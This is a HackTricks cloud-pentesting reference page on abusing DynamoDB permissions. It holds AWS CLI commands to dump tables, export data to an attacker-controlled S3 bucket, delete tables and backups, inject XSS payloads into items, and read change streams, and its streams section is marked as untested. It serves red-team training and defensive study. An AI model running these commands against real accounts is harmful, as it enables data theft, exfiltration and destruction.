# AWS - DynamoDB Post Exploitation

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## DynamoDB

For more information check:

{% content-ref url="../aws-services/aws-dynamodb-enum.md" %}
[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md)
{% endcontent-ref %}

### `dynamodb:BatchGetItem`

An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).

{% tabs %}
{% tab title="json file" %}
{% code overflow="wrap" %}
```bash
aws dynamodb batch-get-item --request-items file:///tmp/a.json

// With a.json
{
    "ProductCatalog" : { // This is the table name
        "Keys": [
            {
            "Id" : { // Primary keys name
                "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
            }
            }
        ]
    }
}
```
{% endcode %}
{% endtab %}

{% tab title="inline" %}
{% code overflow="wrap" %}
```bash
aws dynamodb batch-get-item \
    --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
    --region <region>
```
{% endcode %}
{% endtab %}
{% endtabs %}

**Potential Impact:** Indirect privesc by locating sensitive information in the table

### `dynamodb:GetItem`

**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:

{% code overflow="wrap" %}
```json
aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json

// With a.json
{ 
"Id" : { 
    "N": "205"
}
}
```
{% endcode %}

With this permission it's also possible to use the **`transact-get-items`** method like:

```json
aws dynamodb transact-get-items \
    --transact-items file:///tmp/a.json

// With a.json
[
    {
        "Get": {
            "Key": {
                "Id": {"N": "205"}
            },
            "TableName": "ProductCatalog"
        }
    }
]
```

**Potential Impact:** Indirect privesc by locating sensitive information in the table

### `dynamodb:Query`

**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.

{% tabs %}
{% tab title="json file" %}
{% code overflow="wrap" %}
```bash
aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
 
 // With a.json
 { 
"Id" : { 
    "ComparisonOperator":"EQ",
    "AttributeValueList": [ {"N": "205"} ]
    }
}
```
{% endcode %}
{% endtab %}

{% tab title="inline" %}
```bash
aws dynamodb query \
    --table-name TargetTable \
    --key-condition-expression "AttributeName = :value" \
    --expression-attribute-values '{":value":{"S":"TargetValue"}}' \
    --region <region>
```
{% endtab %}
{% endtabs %}

**Potential Impact:** Indirect privesc by locating sensitive information in the table

### `dynamodb:Scan`

You can use this permission to **dump the entire table easily**.

```bash
aws dynamodb scan --table-name <t_name> #Get data inside the table
```

**Potential Impact:** Indirect privesc by locating sensitive information in the table

### `dynamodb:PartiQLSelect`

You can use this permission to **dump the entire table easily**.

```bash
aws dynamodb execute-statement \
    --statement "SELECT * FROM ProductCatalog"
```

This permission also allow to perform `batch-execute-statement` like:

```bash
aws dynamodb batch-execute-statement \
    --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
```

but you need to specify the primary key with a value, so it isn't that useful.

**Potential Impact:** Indirect privesc by locating sensitive information in the table

### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`

This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:

```bash
aws dynamodb export-table-to-point-in-time \
    --table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
    --s3-bucket <attacker_s3_bucket> \
    --s3-prefix <optional_prefix> \
    --export-time <point_in_time> \
    --region <region>
```

Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:

```bash
aws dynamodb describe-continuous-backups \
  --table-name <tablename>
```

If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:

```bash
aws dynamodb update-continuous-backups \
    --table-name <value> \
    --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
```

**Potential Impact:** Indirect privesc by locating sensitive information in the table

### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`

With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.

```bash
aws dynamodb restore-table-from-backup \
    --backup-arn <source-backup-arn> \
    --target-table-name <new-table-name> \
    --region <region>
```

**Potential Impact:** Indirect privesc by locating sensitive information in the table backup

### `dynamodb:PutItem`

This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.

{% tabs %}
{% tab title="XSS Example" %}
{% code overflow="wrap" %}
```bash
## Create new item with XSS payload
aws dynamodb put-item --table <table_name> --item file://add.json
### With add.json:
{
   "Id": {
      "S": "1000"
   },
   "Name": {
      "S":  "Marc"
   },
   "Description": {
       "S": "<script>alert(1)</script>"
   }
}
```
{% endcode %}
{% endtab %}

{% tab title="AI Example" %}
```bash
aws dynamodb put-item \
    --table-name ExampleTable \
    --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
    --region <region>
```
{% endtab %}
{% endtabs %}

**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table

### `dynamodb:UpdateItem`

This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.

{% tabs %}
{% tab title="XSS Example" %}
{% code overflow="wrap" %}
```bash
## Update item with XSS payload
aws dynamodb update-item --table <table_name> \
    --key file://key.json --update-expression "SET Description = :value" \
    --expression-attribute-values file://val.json
### With key.json:
{
    "Id": {
        "S": "1000"
    }
}
### and val.json
{
    ":value": {
        "S": "<script>alert(1)</script>"
    }
}
```
{% endcode %}
{% endtab %}

{% tab title="AI Example" %}
```bash
aws dynamodb update-item \
    --table-name ExampleTable \
    --key '{"Id": {"S": "1"}}' \
    --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
    --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
    --region <region>
```
{% endtab %}
{% endtabs %}

**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table

### `dynamodb:DeleteTable`

An attacker with this permission can **delete a DynamoDB table, causing data loss**.

```bash
aws dynamodb delete-table \
    --table-name TargetTable \
    --region <region>
```

**Potential impact**: Data loss and disruption of services relying on the deleted table.

### `dynamodb:DeleteBackup`

An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.

```bash
aws dynamodb delete-backup \
    --backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
    --region <region>
```

**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario.

### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`

{% hint style="info" %}
TODO: Test if this actually works
{% endhint %}

An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.

1. Enable a stream on a DynamoDB table:

```bash
bashCopy codeaws dynamodb update-table \
    --table-name TargetTable \
    --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
    --region <region>
```

2. Describe the stream to obtain the ARN and other details:

```bash
bashCopy codeaws dynamodb describe-stream \
    --table-name TargetTable \
    --region <region>
```

3. Get the shard iterator using the stream ARN:

```bash
bashCopy codeaws dynamodbstreams get-shard-iterator \
    --stream-arn <stream_arn> \
    --shard-id <shard_id> \
    --shard-iterator-type LATEST \
    --region <region>
```

4. Use the shard iterator to access and exfiltrate data from the stream:

```bash
bashCopy codeaws dynamodbstreams get-records \
    --shard-iterator <shard_iterator> \
    --region <region>
```

**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes.

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}